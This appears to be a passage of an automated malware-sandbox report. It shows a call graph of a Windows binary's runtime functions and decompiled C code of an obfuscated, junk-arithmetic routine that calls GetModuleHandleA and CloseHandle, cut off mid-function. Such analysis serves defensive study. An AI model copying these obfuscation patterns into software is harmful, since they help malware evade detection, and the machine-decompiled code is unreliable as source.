10262 efd9f4 10264 ef9826 _free 20 API calls 10262->10264 10263->10247 10264->10263 10265->10261 10265->10262 10266 efc6ac __dosmaperr 7 API calls 10265->10266 10266->10265 10267->10238 10269 f016f9 pre_c_initialization 10268->10269 10273 f01719 pre_c_initialization 10268->10273 10270 ef9826 _free 20 API calls 10269->10270 10271 f0170f 10270->10271 10272 ef976a pre_c_initialization 26 API calls 10271->10272 10272->10273 10273->10191 8671 efb4bb 8674 efb3b9 8671->8674 8675 ef9c30 pre_c_initialization 47 API calls 8674->8675 8676 efb3c6 8675->8676 8694 efb4d8 8676->8694 8678 efb3ce 8703 efb14d 8678->8703 8681 efb3e5 8684 efb428 8686 efa6da _free 20 API calls 8684->8686 8686->8681 8688 efb423 8689 ef9826 _free 20 API calls 8688->8689 8689->8684 8690 efb46c 8690->8684 8727 efb023 8690->8727 8691 efb440 8691->8690 8692 efa6da _free 20 API calls 8691->8692 8692->8690 8695 efb4e4 ___FrameUnwindToState 8694->8695 8696 ef9c30 pre_c_initialization 47 API calls 8695->8696 8698 efb4ee 8696->8698 8699 efb572 ___FrameUnwindToState 8698->8699 8701 efa63a _abort 47 API calls 8698->8701 8702 efa6da _free 20 API calls 8698->8702 8730 efaf81 EnterCriticalSection 8698->8730 8731 efb569 8698->8731 8699->8678 8701->8698 8702->8698 8735 ef5e73 8703->8735 8706 efb16e GetOEMCP 8708 efb197 8706->8708 8707 efb180 8707->8708 8709 efb185 GetACP 8707->8709 8708->8681 8710 efbd19 8708->8710 8709->8708 8711 efbd57 8710->8711 8715 efbd27 __dosmaperr 8710->8715 8712 ef9826 _free 20 API calls 8711->8712 8714 efb3f6 8712->8714 8713 efbd42 RtlAllocateHeap 8713->8714 8713->8715 8714->8684 8717 efb57a 8714->8717 8715->8711 8715->8713 8716 efc6ac __dosmaperr 7 API calls 8715->8716 8716->8715 8718 efb14d 49 API calls 8717->8718 8719 efb599 8718->8719 8722 efb5ea IsValidCodePage 8719->8722 8724 efb5a0 8719->8724 8726 efb60f ___scrt_fastfail 8719->8726 8720 efdc5f _ValidateLocalCookies 5 API calls 8721 efb41b 8720->8721 8721->8688 8721->8691 8723 efb5fc GetCPInfo 8722->8723 8722->8724 8723->8724 8723->8726 8724->8720 8886 efb225 GetCPInfo 8726->8886 8962 efafe0 8727->8962 8729 efb047 8729->8684 8730->8698 8734 efafc9 LeaveCriticalSection 8731->8734 8733 efb570 8733->8698 8734->8733 8736 ef5e86 8735->8736 8737 ef5e90 8735->8737 8736->8706 8736->8707 8737->8736 8738 ef9c30 pre_c_initialization 47 API calls 8737->8738 8739 ef5eb1 8738->8739 8743 ef9d7f 8739->8743 8744 ef5eca 8743->8744 8745 ef9d92 8743->8745 8747 ef9dac 8744->8747 8745->8744 8751 efae79 8745->8751 8748 ef9dbf 8747->8748 8749 ef9dd4 8747->8749 8748->8749 8750 efb4d8 __fassign 47 API calls 8748->8750 8749->8736 8750->8749 8752 efae85 ___FrameUnwindToState 8751->8752 8753 ef9c30 pre_c_initialization 47 API calls 8752->8753 8754 efae8e 8753->8754 8756 efaedc ___FrameUnwindToState 8754->8756 8763 efaf81 EnterCriticalSection 8754->8763 8756->8744 8757 efaeac 8764 efaef0 8757->8764 8762 efa63a _abort 47 API calls 8762->8756 8763->8757 8765 efaefe __fassign 8764->8765 8767 efaec0 8764->8767 8765->8767 8771 efac2c 8765->8771 8768 efaedf 8767->8768 8885 efafc9 LeaveCriticalSection 8768->8885 8770 efaed3 8770->8756 8770->8762 8773 efacac 8771->8773 8774 efac42 8771->8774 8776 efa6da _free 20 API calls 8773->8776 8797 efacfa 8773->8797 8774->8773 8779 efac75 8774->8779 8782 efa6da _free 20 API calls 8774->8782 8775 efad08 8786 efad68 8775->8786 8798 efa6da 20 API calls _free 8775->8798 8777 efacce 8776->8777 8778 efa6da _free 20 API calls 8777->8778 8780 eface1 8778->8780 8783 efa6da _free 20 API calls 8779->8783 8796 efac97 8779->8796 8784 efa6da _free 20 API calls 8780->8784 8781 efa6da _free 20 API calls 8785 efaca1 8781->8785 8787 efac6a 8782->8787 8788 efac8c 8783->8788 8789 efacef 8784->8789 8790 efa6da _free 20 API calls 8785->8790 8791 efa6da _free 20 API calls 8786->8791 8799 efba92 8787->8799 8827 efbb90 8788->8827 8794 efa6da _free 20 API calls 8789->8794 8790->8773 8795 efad6e 8791->8795 8794->8797 8795->8767 8796->8781 8839 efad9f 8797->8839 8798->8775 8800 efbaa3 8799->8800 8826 efbb8c 8799->8826 8801 efbab4 8800->8801 8802 efa6da _free 20 API calls 8800->8802 8803 efbac6 8801->8803 8804 efa6da _free 20 API calls 8801->8804 8802->8801 8805 efbad8 8803->8805 8806 efa6da _free 20 API calls 8803->8806 8804->8803 8807 efbaea 8805->8807 8808 efa6da _free 20 API calls 8805->8808 8806->8805 8809 efbafc 8807->8809 8810 efa6da _free 20 API calls 8807->8810 8808->8807 8811 efbb0e 8809->8811 8812 efa6da _free 20 API calls 8809->8812 8810->8809 8813 efbb20 8811->8813 8814 efa6da _free 20 API calls 8811->8814 8812->8811 8815 efbb32 8813->8815 8816 efa6da _free 20 API calls 8813->8816 8814->8813 8817 efbb44 8815->8817 8818 efa6da _free 20 API calls 8815->8818 8816->8815 8819 efa6da _free 20 API calls 8817->8819 8820 efbb56 8817->8820 8818->8817 8819->8820 8821 efa6da _free 20 API calls 8820->8821 8823 efbb68 8820->8823 8821->8823 8822 efbb7a 8825 efa6da _free 20 API calls 8822->8825 8822->8826 8823->8822 8824 efa6da _free 20 API calls 8823->8824 8824->8822 8825->8826 8826->8779 8828 efbb9d 8827->8828 8838 efbbf5 8827->8838 8829 efbbad 8828->8829 8830 efa6da _free 20 API calls 8828->8830 8831 efa6da _free 20 API calls 8829->8831 8832 efbbbf 8829->8832 8830->8829 8831->8832 8833 efa6da _free 20 API calls 8832->8833 8834 efbbd1 8832->8834 8833->8834 8835 efbbe3 8834->8835 8836 efa6da _free 20 API calls 8834->8836 8837 efa6da _free 20 API calls 8835->8837 8835->8838 8836->8835 8837->8838 8838->8796 8840 efadac 8839->8840 8844 efadca 8839->8844 8840->8844 8845 efbc35 8840->8845 8843 efa6da _free 20 API calls 8843->8844 8844->8775 8846 efadc4 8845->8846 8847 efbc46 8845->8847 8846->8843 8881 efbbf9 8847->8881 8850 efbbf9 __fassign 20 API calls 8851 efbc59 8850->8851 8852 efbbf9 __fassign 20 API calls 8851->8852 8853 efbc64 8852->8853 8854 efbbf9 __fassign 20 API calls 8853->8854 8855 efbc6f 8854->8855 8856 efbbf9 __fassign 20 API calls 8855->8856 8857 efbc7d 8856->8857 8858 efa6da _free 20 API calls 8857->8858 8859 efbc88 8858->8859 8860 efa6da _free 20 API calls 8859->8860 8861 efbc93 8860->8861 8862 efa6da _free 20 API calls 8861->8862 8863 efbc9e 8862->8863 8864 efbbf9 __fassign 20 API calls 8863->8864 8865 efbcac 8864->8865 8866 efbbf9 __fassign 20 API calls 8865->8866 8867 efbcba 8866->8867 8868 efbbf9 __fassign 20 API calls 8867->8868 8869 efbccb 8868->8869 8870 efbbf9 __fassign 20 API calls 8869->8870 8871 efbcd9 8870->8871 8872 efbbf9 __fassign 20 API calls 8871->8872 8873 efbce7 8872->8873 8874 efa6da _free 20 API calls 8873->8874 8875 efbcf2 8874->8875 8876 efa6da _free 20 API calls 8875->8876 8877 efbcfd 8876->8877 8878 efa6da _free 20 API calls 8877->8878 8879 efbd08 8878->8879 8880 efa6da _free 20 API calls 8879->8880 8880->8846 8882 efbc30 8881->8882 8883 efbc20 8881->8883 8882->8850 8883->8882 8884 efa6da _free 20 API calls 8883->8884 8884->8883 8885->8770 8887 efb309 8886->8887 8892 efb25f 8886->8892 8889 efdc5f _ValidateLocalCookies 5 API calls 8887->8889 8891 efb3b5 8889->8891 8891->8724 8896 efa4fd 8892->8896 8895 efcaa6 53 API calls 8895->8887 8897 ef5e73 __fassign 47 API calls 8896->8897 8898 efa51d MultiByteToWideChar 8897->8898 8900 efa55b 8898->8900 8908 efa5f3 8898->8908 8903 efbd19 __onexit 21 API calls 8900->8903 8906 efa57c __alloca_probe_16 ___scrt_fastfail 8900->8906 8901 efdc5f _ValidateLocalCookies 5 API calls 8904 efa616 8901->8904 8902 efa5ed 8915 efa61a 8902->8915 8903->8906 8910 efcaa6 8904->8910 8906->8902 8907 efa5c1 MultiByteToWideChar 8906->8907 8907->8902 8909 efa5dd GetStringTypeW 8907->8909 8908->8901 8909->8902 8911 ef5e73 __fassign 47 API calls 8910->8911 8912 efcab9 8911->8912 8919 efc889 8912->8919 8916 efa626 8915->8916 8918 efa637 8915->8918 8917 efa6da _free 20 API calls 8916->8917 8916->8918 8917->8918 8918->8908 8921 efc8a4 8919->8921 8920 efc8ca MultiByteToWideChar 8922 efc8f4 8920->8922 8923 efca7e 8920->8923 8921->8920 8926 efbd19 __onexit 21 API calls 8922->8926 8929 efc915 __alloca_probe_16 8922->8929 8924 efdc5f _ValidateLocalCookies 5 API calls 8923->8924 8925 efb2e1 8924->8925 8925->8895 8926->8929 8927 efc95e MultiByteToWideChar 8928 efc9ca 8927->8928 8930 efc977 8927->8930 8932 efa61a __freea 20 API calls 8928->8932 8929->8927 8929->8928 8946 efa9e8 8930->8946 8932->8923 8934 efc9d9 8936 efbd19 __onexit 21 API calls 8934->8936 8941 efc9fa __alloca_probe_16 8934->8941 8935 efc9a1 8935->8928 8938 efa9e8 12 API calls 8935->8938 8936->8941 8937 efca6f 8940 efa61a __freea 20 API calls 8937->8940 8938->8928 8939 efa9e8 12 API calls 8942 efca4e 8939->8942 8940->8928 8941->8937 8941->8939 8942->8937 8943 efca5d WideCharToMultiByte 8942->8943 8943->8937 8944 efca9d 8943->8944 8945 efa61a __freea 20 API calls 8944->8945 8945->8928 8947 efa714 __dosmaperr 5 API calls 8946->8947 8948 efaa0f 8947->8948 8949 efaa3f 8948->8949 8950 efaa18 LCMapStringEx 8948->8950 8957 efaa70 8949->8957 8954 efaa5f 8950->8954 8955 efdc5f _ValidateLocalCookies 5 API calls 8954->8955 8956 efaa6a 8955->8956 8956->8928 8956->8934 8956->8935 8958 efa714 __dosmaperr 5 API calls 8957->8958 8959 efaa97 8958->8959 8960 efdc5f _ValidateLocalCookies 5 API calls 8959->8960 8961 efaa58 LCMapStringW 8960->8961 8961->8954 8963 efafec ___FrameUnwindToState 8962->8963 8970 efaf81 EnterCriticalSection 8963->8970 8965 efaff6 8971 efb04b 8965->8971 8969 efb00f ___FrameUnwindToState 8969->8729 8970->8965 8983 efb76b 8971->8983 8973 efb099 8974 efb76b 26 API calls 8973->8974 8975 efb0b5 8974->8975 8976 efb76b 26 API calls 8975->8976 8977 efb0d3 8976->8977 8978 efb003 8977->8978 8979 efa6da _free 20 API calls 8977->8979 8980 efb017 8978->8980 8979->8978 8997 efafc9 LeaveCriticalSection 8980->8997 8982 efb021 8982->8969 8984 efb77c 8983->8984 8992 efb778 8983->8992 8985 efb783 8984->8985 8988 efb796 ___scrt_fastfail 8984->8988 8986 ef9826 _free 20 API calls 8985->8986 8987 efb788 8986->8987 8989 ef976a pre_c_initialization 26 API calls 8987->8989 8990 efb7cd 8988->8990 8991 efb7c4 8988->8991 8988->8992 8989->8992 8990->8992 8995 ef9826 _free 20 API calls 8990->8995 8993 ef9826 _free 20 API calls 8991->8993 8992->8973 8994 efb7c9 8993->8994 8996 ef976a pre_c_initialization 26 API calls 8994->8996 8995->8994 8996->8992 8997->8982 10353 ef9b1b 10354 ef9b36 10353->10354 10355 ef9b26 10353->10355 10359 ef9b3c 10355->10359 10358 efa6da _free 20 API calls 10358->10354 10360 ef9b4f 10359->10360 10361 ef9b55 10359->10361 10362 efa6da _free 20 API calls 10360->10362 10363 efa6da _free 20 API calls 10361->10363 10362->10361 10364 ef9b61 10363->10364 10365 efa6da _free 20 API calls 10364->10365 10366 ef9b6c 10365->10366 10367 efa6da _free 20 API calls 10366->10367 10368 ef9b77 10367->10368 10369 efa6da _free 20 API calls 10368->10369 10370 ef9b82 10369->10370 10371 efa6da _free 20 API calls 10370->10371 10372 ef9b8d 10371->10372 10373 efa6da _free 20 API calls 10372->10373 10374 ef9b98 10373->10374 10375 efa6da _free 20 API calls 10374->10375 10376 ef9ba3 10375->10376 10377 efa6da _free 20 API calls 10376->10377 10378 ef9bae 10377->10378 10379 efa6da _free 20 API calls 10378->10379 10380 ef9bbc 10379->10380 10385 ef9a02 10380->10385 10391 ef990e 10385->10391 10387 ef9a26 10388 ef9a52 10387->10388 10404 ef996f 10388->10404 10390 ef9a76 10390->10358 10392 ef991a ___FrameUnwindToState 10391->10392 10399 efaf81 EnterCriticalSection 10392->10399 10394 ef994e 10400 ef9963 10394->10400 10395 ef9924 10395->10394 10398 efa6da _free 20 API calls 10395->10398 10397 ef995b ___FrameUnwindToState 10397->10387 10398->10394 10399->10395 10403 efafc9 LeaveCriticalSection 10400->10403 10402 ef996d 10402->10397 10403->10402 10405 ef997b ___FrameUnwindToState 10404->10405 10412 efaf81 EnterCriticalSection 10405->10412 10407 ef9985 10413 ef9be5 10407->10413 10409 ef9998 10417 ef99ae 10409->10417 10411 ef99a6 ___FrameUnwindToState 10411->10390 10412->10407 10414 ef9bf4 __fassign 10413->10414 10416 ef9c1b __fassign 10413->10416 10415 efac2c __fassign 20 API calls 10414->10415 10414->10416 10415->10416 10416->10409 10420 efafc9 LeaveCriticalSection 10417->10420 10419 ef99b8 10419->10411 10420->10419

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E00EF1F80() {
                                                                                                                                                                                                                                                    				intOrPtr _t287;
                                                                                                                                                                                                                                                    				intOrPtr _t302;
                                                                                                                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                                                                                                                    				int _t309;
                                                                                                                                                                                                                                                    				intOrPtr _t322;
                                                                                                                                                                                                                                                    				signed int _t325;
                                                                                                                                                                                                                                                    				signed int _t327;
                                                                                                                                                                                                                                                    				signed int _t344;
                                                                                                                                                                                                                                                    				intOrPtr _t345;
                                                                                                                                                                                                                                                    				intOrPtr _t348;
                                                                                                                                                                                                                                                    				intOrPtr _t356;
                                                                                                                                                                                                                                                    				signed int _t394;
                                                                                                                                                                                                                                                    				signed int _t398;
                                                                                                                                                                                                                                                    				intOrPtr _t402;
                                                                                                                                                                                                                                                    				intOrPtr _t413;
                                                                                                                                                                                                                                                    				signed int _t437;
                                                                                                                                                                                                                                                    				intOrPtr _t452;
                                                                                                                                                                                                                                                    				signed int _t458;
                                                                                                                                                                                                                                                    				intOrPtr _t466;
                                                                                                                                                                                                                                                    				intOrPtr _t468;
                                                                                                                                                                                                                                                    				intOrPtr _t482;
                                                                                                                                                                                                                                                    				int* _t486;
                                                                                                                                                                                                                                                    				intOrPtr _t487;
                                                                                                                                                                                                                                                    				intOrPtr _t519;
                                                                                                                                                                                                                                                    				intOrPtr* _t520;
                                                                                                                                                                                                                                                    				void* _t521;
                                                                                                                                                                                                                                                    				void* _t522;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t520 = _t521 - 0x68;
                                                                                                                                                                                                                                                    				_t522 = _t521 - 0xc0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t520 + 0x64)) = 0xf8d5f0;
                                                                                                                                                                                                                                                    				 *( *((intOrPtr*)(_t520 + 0x64)) + 0xf8) =  *(_t520 + 0x78);
                                                                                                                                                                                                                                                    				 *(_t520 + 0x58) = 0x2565;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x4c) = 0x24c7;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x5c) = 0x2506;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x60) = 0x2622;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x54) = 0x24c7;
                                                                                                                                                                                                                                                    				 *(_t520 + 0x50) = 0x2565;
                                                                                                                                                                                                                                                    				if( *(_t520 + 0x54) < ( *(_t520 + 0x50) ^ 0x00000347)) {
                                                                                                                                                                                                                                                    					if( *(_t520 + 0x58) >  *(_t520 + 0x4c) + 0x161) {
                                                                                                                                                                                                                                                    						__eflags =  *(_t520 + 0x58) - ( *(_t520 + 0x5c) ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc71)) -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc);
                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                    							__eflags =  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) -  *(_t520 + 0x4c) *  *0x00F8D694 *  *0xf8d62c;
                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                    								 *(_t520 + 0x18) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c);
                                                                                                                                                                                                                                                    								GetModuleHandleA( *(_t520 + 0x18));
                                                                                                                                                                                                                                                    								 *(_t520 + 4) =  *(_t520 + 0x60) -  *(_t520 + 0x60) ^ 0x00002801;
                                                                                                                                                                                                                                                    								 *(_t520 + 8) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                    								_t322 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    								 *(_t520 + 0xc) = ( *(_t520 + 0x60) | 0x000024c7) *  *(_t322 + 0xbadc81);
                                                                                                                                                                                                                                                    								_t413 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t520 + 0x10)) = _t413;
                                                                                                                                                                                                                                                    								_t325 =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c) &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbc1);
                                                                                                                                                                                                                                                    								__eflags = _t325;
                                                                                                                                                                                                                                                    								 *(_t520 + 0x14) = _t325;
                                                                                                                                                                                                                                                    								_t327 = E00F08570( *(_t520 + 4),  *(_t520 + 8),  *(_t520 + 0xc),  *((intOrPtr*)(_t520 + 0x10)),  *(_t520 + 0x14));
                                                                                                                                                                                                                                                    								_t522 = _t522 + 0x14;
                                                                                                                                                                                                                                                    								 *(_t520 + 0x5c) = _t327;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x4c) =  *(_t520 + 0x4c) ^ 0x000002ef;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0x218;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x54) =  *(_t520 + 0x54) + 0x161;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000002ad;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x34)) =  *(_t520 + 0x50) + 0x254;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x38)) =  *(_t520 + 0x58) - 0x2a;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x3c)) =  *(_t520 + 0x4c) - 0xc3;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x40)) =  *(_t520 + 0x58) + 0x2d5;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x44)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    						 *(_t520 + 0x48) =  *(_t520 + 0x54) ^ 0x000000af;
                                                                                                                                                                                                                                                    						_push( *(_t520 + 0x48));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x44)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x40)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x3c)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x38)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x34)));
                                                                                                                                                                                                                                                    						 *(_t520 + 0x60) = E00EF3690();
                                                                                                                                                                                                                                                    						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000001a5;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x1c)) =  *(_t520 + 0x60) - 0xbd;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x20) =  *(_t520 + 0x54) ^ 0x000003b0;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x24)) =  *(_t520 + 0x54) + 0xac;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x28)) =  *(_t520 + 0x5c) - 0x9b;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x2c)) =  *(_t520 + 0x58) - 0x5f;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t520 + 0x30)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x30)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x2c)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x28)));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x24)));
                                                                                                                                                                                                                                                    						_push( *(_t520 + 0x20));
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t520 + 0x1c)));
                                                                                                                                                                                                                                                    						_t344 = E00EF3E70();
                                                                                                                                                                                                                                                    						_t522 = _t522 + 0x30;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x58) = _t344;
                                                                                                                                                                                                                                                    						 *(_t520 + 0x54) =  *(_t520 + 0x54) - 0x161;
                                                                                                                                                                                                                                                    						_t519 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t345 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t68 = _t345 + 0x94; // 0x1482000
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t519 + 0x90)) =  *_t68;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *(_t520 + 0x54) > ( *(_t520 + 0x58) ^ 0x00000d01)) {
                                                                                                                                                                                                                                                    					_t437 =  *0xf8d628; // 0x1
                                                                                                                                                                                                                                                    					 *(_t520 - 0x38) = _t437 &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xac);
                                                                                                                                                                                                                                                    					CloseHandle( *(_t520 - 0x38));
                                                                                                                                                                                                                                                    					_t348 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t202 = _t348 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) -  *_t202 +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xb4));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) |  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) *  *0x00F8D694 -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                    					GetCurrentProcessId();
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x40)) = 0x28ec;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x3c)) = 0x3c28;
                                                                                                                                                                                                                                                    					 *0xf8df10 = E00F05FF0(__eflags,  *((intOrPtr*)(_t520 - 0x40)),  *((intOrPtr*)(_t520 - 0x3c)));
                                                                                                                                                                                                                                                    					 *(_t520 - 0x58) =  *(_t520 + 0x54) &  *0x01B3B1DD;
                                                                                                                                                                                                                                                    					_t356 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t222 = _t356 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                    					 *(_t520 - 0x54) =  *(_t520 + 0x60) +  *_t222;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x50) =  *(_t520 + 0x50) * 0x26e5 *  *(_t520 + 0x60);
                                                                                                                                                                                                                                                    					 *(_t520 - 0x4c) =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14) ^ 0x000026d4;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x48) =  *(_t520 + 0x50) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xa4)) |  *(_t520 + 0x54);
                                                                                                                                                                                                                                                    					_t452 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t238 = _t452 + 0xb4; // 0x0
                                                                                                                                                                                                                                                    					 *(_t520 - 0x44) =  *_t238 *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                    					MultiByteToWideChar( *(_t520 - 0x58),  *(_t520 - 0x54),  *(_t520 - 0x50),  *(_t520 - 0x4c),  *(_t520 - 0x48),  *(_t520 - 0x44));
                                                                                                                                                                                                                                                    					_t458 =  *(_t520 + 0x5c) | ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc51) &  *0xf8d6cc) - 0x000027b9;
                                                                                                                                                                                                                                                    					__eflags = _t458;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x5c) = _t458;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x39;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x18)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x14)) =  *(_t520 + 0x60) + 6;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x10) =  *(_t520 + 0x60) ^ 0x000003ba;
                                                                                                                                                                                                                                                    					 *(_t520 - 0xc) =  *(_t520 + 0x5c) ^ 0x0000001b;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 8)) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                    					 *(_t520 - 4) =  *(_t520 + 0x4c);
                                                                                                                                                                                                                                                    					 *_t520 =  *(_t520 + 0x50) + 0x16f;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) = E00F055C0( *((intOrPtr*)(_t520 - 0x18)),  *((intOrPtr*)(_t520 - 0x14)),  *(_t520 - 0x10),  *(_t520 - 0xc),  *((intOrPtr*)(_t520 - 8)),  *(_t520 - 4),  *_t520);
                                                                                                                                                                                                                                                    					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                    					_t466 =  *0xf8d69c; // 0x1a0e74
                                                                                                                                                                                                                                                    					_t287 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					_t136 = _t287 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    					_t468 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t468 + 0x58)) =  *_t136 - _t466 - 0x1a0ed5;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x54) =  *(_t520 + 0x54) ^ 0x000002f4;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) =  *(_t520 + 0x60) - 0x3b;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x50) =  *(_t520 + 0x50) - 0x5f;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x34)) =  *(_t520 + 0x58) + 0xf8;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x30)) =  *(_t520 + 0x4c) - 0x90;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x2c)) =  *(_t520 + 0x5c) - 0xb;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x28)) =  *(_t520 + 0x60) + 0x254;
                                                                                                                                                                                                                                                    					 *(_t520 - 0x24) =  *(_t520 + 0x58) ^ 0x000003de;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x20)) =  *(_t520 + 0x54) - 0x93;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t520 - 0x1c)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x5c) = E00F07440( *((intOrPtr*)(_t520 - 0x34)),  *((intOrPtr*)(_t520 - 0x30)),  *((intOrPtr*)(_t520 - 0x2c)),  *((intOrPtr*)(_t520 - 0x28)),  *(_t520 - 0x24),  *((intOrPtr*)(_t520 - 0x20)),  *((intOrPtr*)(_t520 - 0x1c)));
                                                                                                                                                                                                                                                    					 *(_t520 + 0x4c) =  *(_t520 + 0x4c) + 0xac;
                                                                                                                                                                                                                                                    					 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0xbd;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x38)) >=  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14)) {
                                                                                                                                                                                                                                                    						_t302 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t178 = _t302 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t303 =  *0xf8d5ec; // 0xf8d5f0
                                                                                                                                                                                                                                                    						_t394 =  *_t178 +  *((intOrPtr*)(_t303 + 0x74)) ^  *0xf8d6d0 ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                    						__eflags = _t394;
                                                                                                                                                                                                                                                    						 *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0) = _t394;
